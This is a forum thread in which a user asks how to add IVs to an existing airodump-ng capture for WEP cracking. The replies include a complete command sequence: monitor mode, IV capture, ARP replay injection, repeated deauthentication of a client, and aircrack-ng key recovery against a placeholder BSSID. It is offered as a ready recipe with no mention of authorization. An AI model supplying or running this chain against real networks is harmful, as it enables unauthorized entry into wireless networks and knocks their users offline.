-
adding additional IV's to an existing capture file possibe?
Hi,
I startd to capture with "airodump-ng -c <chan> -w <file> --ivs ath1.
When I restart capturing the old capture file is overwritten.
Is there a way to add IVS from a new scan to an already existing capture file? How?
Any feedback is apprecaited very much! Thank you,
John
-
just create two files and list them both in the aircrack arguments, easiest way
-
You can always start cracking while you are capturing.
-
Try this string....
airmon-ng start wifi0 11
airodump-ng --ivs -w dump --channel [channel] ath1
aireplay-ng -b [bssid] -h [client] --arpreplay ath1
aireplay-ng -a [bssid] -c [client] --deauth 30 ath1
aircrack-ng -b [bssid] dump*.ivs
aircrack-ng -b [bssid] -n 64 dump*.ivs
I hope this helps. I notice when I use this string, I get lots of different dump.ivs files. Remember tho, I'm a noob sooooooo.....
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules